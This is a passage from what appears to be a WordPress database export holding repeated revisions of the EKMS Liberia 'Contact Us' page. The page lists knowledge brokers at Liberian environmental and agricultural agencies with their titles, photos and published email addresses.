src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:54:32','2021-03-23 08:54:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3596,42,'2021-03-23 09:12:52','2021-03-23 09:12:52','','bgoll','','inherit','open','closed','','bgoll-2','','','2021-03-23 09:12:52','2021-03-23 09:12:52','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png',0,'attachment','image/png',0),(3597,42,'2021-03-23 09:14:19','2021-03-23 09:14:19','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 09:14:19','2021-03-23 09:14:19','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3598,42,'2021-03-23 09:14:20','2021-03-23 09:14:20','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a 